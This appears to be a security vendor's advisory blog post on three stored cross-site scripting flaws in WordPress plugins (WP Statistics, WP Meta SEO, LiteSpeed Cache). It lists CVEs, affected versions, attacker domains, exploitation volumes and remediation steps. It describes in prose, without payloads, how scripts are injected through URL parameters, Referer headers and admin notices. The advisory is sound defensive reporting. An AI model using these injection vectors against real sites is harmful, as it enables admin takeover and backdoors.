Critical WordPress Plugin Vulnerabilities Expose Over 6 Million Sites to Exploitation June 4, 2024 CVE or Exploit Name CVE-2024-2194(CVSS7.2)- First bug affected WPStatistics, which has more than 600,000 installations. WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting exploits making it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2023-6961(CVSS 7.2) The second bug hit the WP Meta SEO plug-in which has more than 20,000 installations. This bug involves the improper neutralization of input during web page generation, leading to cross-site scripting vulnerabilities. CVE-2023-40000(CVSS8.3)- The third bug hit the LiteSpeed Cache plug-in, which has over 5 million installations and allows improper neutralization of input during web page generation (“Cross-site Scripting”). Timeline May 29, 2024 NIST reports update on CVE 2024-2194 May 29, 2024 Both MITRE and NIST report updates on CVE-2023-6961 May 29, 2024 NIST reports update on CVE-2023-40000 Overview of Exploit Three high-severity WordPress plug-in vulnerabilities, CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, are susceptible to unauthenticated cross-site scripting (XSS) attacks. These vulnerabilities pose a significant risk, enabling attackers to inject malicious scripts through popular WordPress plug-ins, potentially impacting almost 6 million WordPress installations. Impact Fastly reported that CVE-2024-2194 exploitation has been associated with the domain media.cdnstaticjs[.]com. Most attacks targeting this vulnerability are from 17 distinct IP addresses, originating from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a notable concentration of attack sources from the Netherlands. CVE-2024-2194 exploitation CVE-2023-6961 exploitation can be correlated with the domain idc.cloudiync[.]com. A single IP address originating from AS202425 (IP Volume Inc.) has made over 5 billion exploit attempts targeting this vulnerability. Since May 16th, media.cdnstaticjs[.]com has been used to launch attack payloads to exploit this vulnerability. Interestingly, this domain is also linked to attacks targeting CVE-2024-2194. CVE-2024-2194 exploitation Unlike the other vulnerabilities, Fastly reported that exploitation of CVE-2023-40000 is associated with the domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com. The most recent attack involving the domain cdn.mediajsdelivery[.]com was observed on April 15th. CVE-2023-40000 Exploitation Why Is This Important? These vulnerabilities hold significant importance within the context of WordPress’s widespread popularity based on the staggering frequency of attacks targeting the platform. According to a report from WebTribunal, WordPress faces an astonishing 90,000 attacks per minute. Such a relentless onslaught underscores the critical need for robust security measures. Failure to regularly update WordPress leaves websites highly vulnerable to exploitation. Alarmingly, nearly 61% of attacked sites were found to be outdated, indicating that many website owners neglect crucial security updates. The vulnerabilities CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 add further urgency to this situation. SC media reported that WPStatistics, affected by CVE-2024-2194, has over 600,000 installations, making it a prime target for exploitation. Similarly, CVE-2023-6961 targets the WP Meta SEO plugin, which despite having a smaller user base of over 20,000 installations, still presents a significant risk given the potential impact on website metadata and SEO performance. Moreover, the LiteSpeed Cache plugin, affected by CVE-2023-40000 and utilized by over 5 million installations, highlights the widespread reliance on WordPress plugins and the urgent need to address vulnerabilities to safeguard against attacks. Implications The consequences of these vulnerabilities are significant and widespread, exacerbated by the alarming rate at which they are exploited. Each vulnerability presents immediate risks to individual websites, including the potential for unauthorized access, data breaches, and website defacement. CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 all pose serious threats, compromising the trustworthiness of websites and leaving sensitive user logins and data vulnerable to theft or manipulation. The widespread usage of WordPress plugins means that vulnerabilities can be exploited to launch large-scale attacks. Exploitation of these vulnerabilities by cybercriminals can lead to disruptions in services, compromise business operations, and facilitate the spread of malware or ransomware. The exploitation attempts, numbering in the billions for some vulnerabilities, highlight the severity and persistence of the threat landscape. How it works Fastly reported that the vulnerabilities CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 in WordPress plugins present opportunities for attackers to exploit websites through unauthenticated stored cross-site scripting (XSS) attacks. Here’s how these vulnerabilities can be exploited: CVE-2024-2194: This vulnerability affects the WP Statistics plugin (version 14.5 and earlier) and allows attackers to inject malicious scripts via the URL search parameter. Specifically, attackers can inject a script tag that points to an obfuscated JavaScript file hosted on an external domain. When a user accesses an infected page, the injected script is executed, enabling attackers to perform malicious actions like creating new administrator accounts, injecting backdoors, and setting up tracking scripts. CVE-2023-6961: The vulnerability in the WP Meta SEO plugin (version 4.5.12 and earlier) involves stored cross-site scripting attacks through the Referer HTTP header. Attackers can send a payload to a target site, which, when visited by an administrator, leads to the execution of obfuscated JavaScript from a callback domain. This can result in exploiting the victim’s credentials for further malicious activities after targeting pages generating 404 responses. CVE-2023-40000: The LiteSpeed Cache WordPress plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through certain parameters. When an admin accesses any backend page, an XSS payload disguised as an admin notification is executed, potentially leading to subsequent malicious actions using the admin’s credentials. Simply, these vulnerabilities can be exploited by attackers to inject and execute malicious scripts that enable activities such as creating unauthorized accounts, injecting backdoors, and tracking site activities. Recommendations & Remediation For CVE-2023-40000 and similar vulnerabilities such as CVE-2024-2194 and CVE-2023-6961, wordfence reported that patches are available. Implementing input sanitization measures within plugins can validate and sanitize user input, preventing the execution of malicious scripts and mitigating risks associated with stored cross-site scripting attacks. Routine security audits of WordPress plugins can proactively identify and address vulnerabilities before attackers exploit them. Educating administrators and users about security best practices, such as avoiding clicking on suspicious links and being cautious when accessing administrative pages, is also essential. Implementing Content Security Policy (CSP) headers can further mitigate the impact of cross-site scripting attacks by restricting the sources from which resources can be loaded on a webpage. Lastly, establishing strong monitoring systems to detect security incidents promptly is indispensable. About BreachLock BreachLock is a global leader in Continuous Attack Surface Discovery and Penetration Testing. Continuously discover, prioritize, and mitigate exposures with evidence-backed Attack Surface Management, Penetration Testing, and Red Teaming. Elevate your defense strategy with an attacker’s view that goes beyond common vulnerabilities and exposures. Each risk we uncover is backed by validated evidence. We test your entire attack surface and help you mitigate your next cyber breach before it occurs. Know Your Risk. Contact BreachLock today! Industry recognitions we have earned Tell us about your requirements and we will respond within 24 hours. Fill out the form below to let us know your requirements. We will contact you to determine if BreachLock is right for your business or organization.